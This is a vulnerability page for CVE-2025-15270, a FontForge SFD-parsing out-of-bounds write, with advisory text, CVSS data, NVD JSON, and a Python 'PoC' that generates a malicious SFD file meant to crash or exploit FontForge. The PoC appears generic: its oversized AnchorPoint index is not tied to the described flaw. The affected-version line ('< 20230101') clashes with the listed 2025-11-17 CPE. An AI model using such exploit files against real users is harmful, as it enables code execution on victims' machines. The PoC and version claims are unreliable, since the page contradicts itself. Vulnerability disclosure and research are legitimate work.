CVE-2025-15270

Description

FontForge SFD File Parsing Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated array. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28563.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fontforge:fontforge:2025-11-17:*:*:*:*:*:*:* - VULNERABLE

FontForge < 20230101 (所有未修复版本)

FontForge SFD解析器相关版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-15270 PoC - FontForge SFD File Array Index Validation Issue
# Generate malicious SFD file to trigger out-of-bounds write

import struct
import sys

def create_malicious_sfd():
    """Generate a malicious SFD file with out-of-bounds array index"""
    
    # SFD file header
    sfd_content = "SplineFontDB: 3.0\n"
    sfd_content += "FontName: MaliciousFont\n"
    sfd_content += "FullName: Malicious Font\n"
    sfd_content += "FamilyName: Malicious Family\n"
    sfd_content += "Version: 1.0\n"
    sfd_content += "Encoding: iso10646-1\n"
    sfd_content += "BeginChars: 256 256\n"
    
    # Create glyph with malicious array index
    # This triggers the improper validation vulnerability
    malicious_index = 0xFFFFFFFF  # Out of bounds index
    
    sfd_content += f"""BeginGlyph: A 1
Width: 1000
VWidth: 0
Flags: W
AnchorPoint: "top" {malicious_index} 0 basechar 0 0 ""
EndSplineSet
EndChar
"""
    
    sfd_content += "EndChars\n"
    sfd_content += "EndFont\n"
    
    return sfd_content

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15270-poc.py <output.sfd>")
        print("This PoC generates a malicious SFD file for FontForge")
        sys.exit(1)
    
    output_file = sys.argv[1]
    sfd_data = create_malicious_sfd()
    
    with open(output_file, 'w') as f:
        f.write(sfd_data)
    
    print(f"[+] Malicious SFD file created: {output_file}")
    print(f"[+] Open this file with FontForge to trigger the vulnerability")

if __name__ == "__main__":
    main()

# Additional exploitation notes:
# 1. The vulnerability is in FontForge's SFD file parser
# 2. Attack vector: User must open the malicious SFD file
# 3. Result: Out-of-bounds write leading to RCE
# 4. CVSS 8.8 - Network based, low complexity, requires user interaction

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15270
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15270
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15270/
[4] VulDB https://vuldb.com/cve/CVE-2025-15270
[5] https://www.zerodayinitiative.com/advisories/ZDI-25-1194/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15270", "sourceIdentifier": "[email protected]", "published": "2025-12-31T07:15:50.897", "lastModified": "2026-01-07T16:11:14.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FontForge SFD File Parsing Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated array. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28563."}, {"lang": "es", "value": "Vulnerabilidad de ejecución remota de código por validación incorrecta del índice de la matriz en el análisis de archivos SFD de FontForge. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de FontForge. Se requiere interacción del usuario para explotar esta vulnerabilidad, ya que el objetivo debe visitar una página maliciosa o abrir un archivo malicioso.\n\nLa falla específica reside en el análisis de archivos SFD. El problema se debe a la falta de validación adecuada de los datos proporcionados por el usuario, lo que puede resultar en una escritura más allá del final de una matriz asignada. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del usuario actual. Fue ZDI-CAN-28563."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-129"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fontforge:fontforge:2025-11-17:*:*:*:*:*:*:*", "matchCriteriaId": "F1A9337A-AD25-4C56-964A-CCD44CEF611F"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1194/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}